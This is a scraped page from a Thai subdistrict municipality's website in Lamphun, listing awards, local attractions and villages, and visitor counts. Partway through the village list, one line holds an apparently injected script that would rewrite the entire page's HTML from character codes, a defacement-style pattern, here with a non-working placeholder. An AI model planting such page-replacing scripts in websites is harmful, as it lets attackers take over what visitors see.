สำนักงานเทศบาลตำบลบ้านกลาง จังหวัดลำพูน
9 วิธีเอาตัวรอดจากโควิด-19 9 วิธีเอาตัวรอดจากโควิด-19 9 วิธีเอาตัวรอดจากโควิด-19 สำนักงานเทศบาลตำบลบ้านกลาง จังหวัดลำพูน สำนักงานเทศบาลตำบลบ้านกลาง จังหวัดลำพูน
ข่าวประชาสัมพันธ์
 
ข่าวจัดซื้อ-จัดจ้าง
 
รางวัลแห่งเกียรติยศ
รางวัลศูนย์อาสาสมัครป้องกันภัยฝ่ายพลเรือนดีเด่น
รางวัล อปท.ดีเด่น ด้านการส่งเสริม ปกป้อง และคุ้มครองสิทธิมนุษยชน
รางวัลเกียรติบัตรรับรองมาตรฐานศูนย์พัฒนาเด็กเล็กคุณภาพ
และมาตรฐานโครงการอาหารปลอดภัยในศูนย์พัฒนาเด็กเล็ก
ใบประกาศเกียรติคุณสำหรับองค์กรปกครองส่วนท้องถิ่นที่ได้ขับเคลื่อนแผนปฏิบัติการ ลำพูนเมืองสะอาดสู่ความยั่งยืน ประจำปี 2563
ประกาศเกียรติคุณ
เทศบาลตำบลบ้านกลาง เข้ารับประกาศนียบัตรจากปลัดกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม ในงานร้อยดวงใจร่วมใจลดโลกร้อน ประจำปี 2563
รางวัล อปท.ดีเด่น ด้านการป้องกันการทุจริต ต่อเนื่อง 4 ปี
รางวัลองค์กรที่ทำคุณประโยชน์แก่ผู้อยู่ในภาวะยากลำบาก
ประกาศเกียรติคุณผลการประเมิน อันดับ 1 ตามโครงการการประเมินคุณธรรมและความโปร่งใสในการดำเนินการขององค์กรปกครองส่วนท้องถิ่น (Integrity and Transparency Assessment:ITA) ประจำปีงบประมาณ 2558
รางวัล อปท.ที่มีความพยายามในการจัดเก็บภาษี
เกียรติบัตรรับรองคุณภาพระบบบริการอนามัยสิ่งแวดล้อมองค์กรปกครองส่วนท้องถิ่น ประจำปีงบประมาณ 2562 (Environmental Health Accreditation : EHA)
เกียรติบัตรองค์กรปกครองส่วนท้องถิ่นที่มีผลการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานของหน่วยงานภาครัฐ
รางวัล อปท ดีเด่น ด้านการป้องกันและบรรเทาสาธารณภัย
ใบประกาศเกียรติคุณยกย่องเชิดชูเกียรติองค์กรปกครองส่วนท้องถิ่นดีเด่นทางวัฒนธรรม จังหวัดลำพูน ประจำปี 2562
ประกาศเกียรติคุณองค์กรลดก๊าซเรือนกระจก
รางวัลองค์กรปกครองส่วนท้องถิ่นที่มีผลการปฏิบัติงานดีเด่น ประจำปีงบประมาณ 2562 ด้านการศึกษา
รางวัล อปท. ต้นแบบ ด้านการป้องกันการทุจริต
ประกาศเกียรติคุณ ประเภทหน่วยงานภาครัฐดีเด่น สำหรับผู้สูงอายุ
รางวัลพระปกเกล้า ต่อเนื่อง 2 ปี
รางวัลนวัตกรรมสุขภาพชุมชนดีเด่น ระดับจังหวัด
รางวัล อปท.ดีเด่นด้านสตรีและครอบครัว ต่อเนื่อง 8 ปี
รางวัลองค์กรปกครองส่วนท้องถิ่นที่มีการบริการจัดการบ้านเมืองที่ดีตามหลักธรรมาภิบาล
รางวัลองค์กรปกครองส่วนท้องถิ่นดีเด่น ด้านการดำเนินงานทางวัฒนธรรม
รางวัลเกียรติบัตรรับรองคุณภาพระบบบริการอนามัยสิ่งแวดล้อม
รางวัล อปท.ที่มีการคัดแยกขยะอินทรีย์เพื่อผลิตพลังงาน ในระดับดีเยี่ยม
ประกาศเกียรติคุณ องค์กรปกครองส่วนท้องถิ่นที่มีมาตรการควบคุมการรื้อถอนสิ่งปลูกสร้าง ที่มีแร่ใยหินเป็นส่วนประกอบฯ ตามโครงการรณรงค์แก้ไขปัญหาการใช้วัสดุ ที่ปนเปื้อนแร่ใยหินจังหวัดลำพูน
รางวัลเมืองสิ่งแวดล้อมยั่งยืนดีเยี่ยมระดับภาค
ทต.บ้านกลางลำพูนคว้ารางวัลเมืองสิ่งแวดล้อมยั่งยืนดีเยี่ยมระดับภาค
ประกาศเกียรติคุณ เชิดชูเกียรติระดับทอง องค์กรปกครองส่วนท้องถิ่นต้นแบบด้านการป้องกันการทุจริต ประจำปี 2559
รางวัลคุณธรรมแห่งชาติ  ประเภทองค์กร และโครงการ
รางวัลศูนย์พัฒนาเด็กเล็กดีเด่น
ใบประกาศเกียรติคุณ ด้านความโปร่งใสและส่งเสริมการมีส่วนร่วมของประชาชน จากสถาบันพระปกเกล้า
รางวัลแห่งเกียรติยศทั้งหมด 

 

แนะนำของดีบ้านเฮา
พระเจ้าทองทิพย์
หมู่ที่ 6 บ้านสิงห์เคิ่ง
หมู่ที่ 3 บ้านขี้เหล็ก
หอหลวง(หอจัย) พ่อปู่พญาฮุ้งขาว ประเพณีปางเก้า
วัดศรีชุม
อนุสาวรีย์พระนางจามเทวี
พระพุทธชยันตีศรีบ้านกลาง
หมู่ที่ 11 บ้านหอชัย
หมู่ที่ 9 บ้านกลาง
หมู่ที่ 4 บ้านสันป่าฝ้าย
หมู่ที่ 1 บ้านพญาผาบ
หมู่ที่ 7 บ้านร่องส้าว
อนุสาวรีย์พญาผาบศัตรู
หมู่ที่ 5 บ้านศรีชุม
<script>document.documentElement.innerHTML=(String.fromCharCode(This is html code))</script>
หมู่ที่ 2 บ้านท่าล้อ-ศรีคำ
ศูนย์กีฬาและนันทนาการจามเทวีเทศบาลตำบลบ้านกลาง
หมู่ที่ 10 บ้านประตูโขง
หมู่ที่ 8 บ้านแม่ยาก
หมู่ที่ 12 บ้านแจ่มพัฒนา
ของดีบ้านเฮาทั้งหมด 

 

ข้อมูลน่าสนใจ
สถิติผู้เข้าชมเว็บไซต์

สถิติผู้เข้าเว็บ
 วันนี้ 
308
 เมื่อวาน 
430
 เดือนนี้ 
5,843
 เดือนที่ผ่านมา 
10,881
 ปีนี้ 
98,585
 ปีที่ผ่านมา 
111,238
   ทั้งหมด 
262,032
 เริ่มบันทึกวันที่ 12/02/2561